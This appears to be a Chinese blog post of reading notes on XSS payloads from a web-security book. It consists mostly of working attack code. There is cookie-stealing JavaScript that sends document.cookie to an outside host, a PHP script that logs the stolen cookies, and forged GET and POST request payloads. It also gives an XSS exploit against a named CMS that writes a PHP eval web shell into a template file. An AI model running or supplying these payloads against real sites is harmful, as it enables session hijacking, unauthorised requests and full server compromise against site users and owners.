标签:
xss payload可以使用富客户端文本书写,大多数用javascript,少部分用actionscript等等。
1.盗取cookie,发起cookie劫持
使用xss漏洞插入cookie.js
cookie.js代码:
1 |
var img = document.createElement("img"); |
2 |
3 |
img.src = "http://lanu.sinaapp.com/cookie.php?cookie="+escape(document.cookie); |
4 |
5 |
document.body.appendChild(img); |
cookie.php代码
1 |
<?php |
2 |
3 |
$file = fopen("cookie.txt","a"); |
4 |
5 |
fwrite($file,$_GET[‘cookie‘]); |
6 |
7 |
fclose($file); |
8 |
9 |
?> |
2.构造GET和POST请求
get.js代码:
1 |
var img = document.createElement("img"); |
2 |
3 |
img.src = "一个可以使用的get请求链接"; |
4 |
5 |
document.body.appendChild(img); |
post.js代码:
代码1:(DOM节点方式)
01 |
var f = document.createElement("form"); |
02 |
03 |
f.action =""; |
04 |
05 |
f.method = "post"; |
06 |
07 |
document.body.appendChild(f); |
08 |
09 |
var i1 = document.createElement("input"); |
10 |
11 |
i1.name = "xxx"; |
12 |
13 |
i1.value = "xxxx"; |
14 |
15 |
f.appendChild(i1); |
16 |
17 |
var i2 = document.createElement("input"); |
18 |
19 |
i2.name = "aaa"; |
20 |
21 |
i2.value = "aaa"; |
22 |
23 |
f.appendChild(i2); |
24 |
25 |
f.submit(); |
代码2:
1 |
var dd = document.createElement("div"); |
2 |
3 |
document.body.appendChild(dd); |
4 |
5 |
dd.innerHTML =‘<form action="" method="post" id="xssform" name="mbform">‘+‘<input type="hidden" value="xxxx" name="xxx" />‘+‘<input type="text" value="aaaa" name="aaa" />‘+‘</form>‘; |
6 |
7 |
document.getElementById("xssform").submit(); |
代码3:(使用XMLHttpRequest)
01 |
var url = "http://lanu.sinaapp.com"; |
02 |
03 |
var postStr = "aaa=aaaa&xxx=xxxx"; |
04 |
05 |
var ajax = null; |
06 |
07 |
if(window.XMLHttpRequest) |
08 |
09 |
{ |
10 |
11 |
ajax = new XMLHttpRequest(); |
12 |
13 |
} |
14 |
15 |
else if(window.ActiveXObject) |
16 |
17 |
{ |
18 |
19 |
ajax = new ActiveXObject("Microsoft.XMLHTTP");//ie6和一下老版本 |
20 |
21 |
} |
22 |
23 |
else |
24 |
25 |
{ |
26 |
27 |
return; |
28 |
29 |
} |
30 |
31 |
ajax.open("POST", url , true); |
32 |
33 |
ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); |
34 |
35 |
ajax.send(postStr); |
36 |
37 |
//ajax.open("GET", url, true); |
38 |
39 |
//ajax.send(null); |
40 |
41 |
ajax.onreadystatechange = function() |
42 |
43 |
{ |
44 |
45 |
if(ajax.readyState == 4 && ajax.status == 200) |
46 |
47 |
{ |
48 |
49 |
//alert("Done!"); |
50 |
51 |
} |
52 |
53 |
} |
-------------------
3.xss钓鱼
4.浏览器识别和用户安装软件识别
http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/
5.css history hack
http://ha.ckers.org/weird/CSS-history-hack.html
读《白帽子讲web安全》笔记
---------------------
xxs payload getshell 实例:
骑士cms getshell
01 |
//构造好的能写入一句话的连接 |
02 |
03 |
var Shelldata=‘tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6‘; |
04 |
05 |
try |
06 |
07 |
{ |
08 |
09 |
//调用XMLHttpRequest |
10 |
var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject(‘Microsoft.XMLHTTP‘)); |
11 |
12 |
xml.open("POST",‘admin_templates.php?act=do_edit‘,false); |
13 |
xml.setRequestHeader(‘Content-Type‘, ‘application/x-www-form-urlencoded‘); |
14 |
xml.onreadystatechange = function() |
15 |
{ |
16 |
if(xml.readyState == 4) |
17 |
18 |
{ |
19 |
20 |
} |
21 |
} |
22 |
xml.send(Shelldata); |
23 |
} |
24 |
catch(e) |
25 |
26 |
{ |
27 |
28 |
} |
标签:
原文地址:http://www.cnblogs.com/milantgh/p/4241267.html
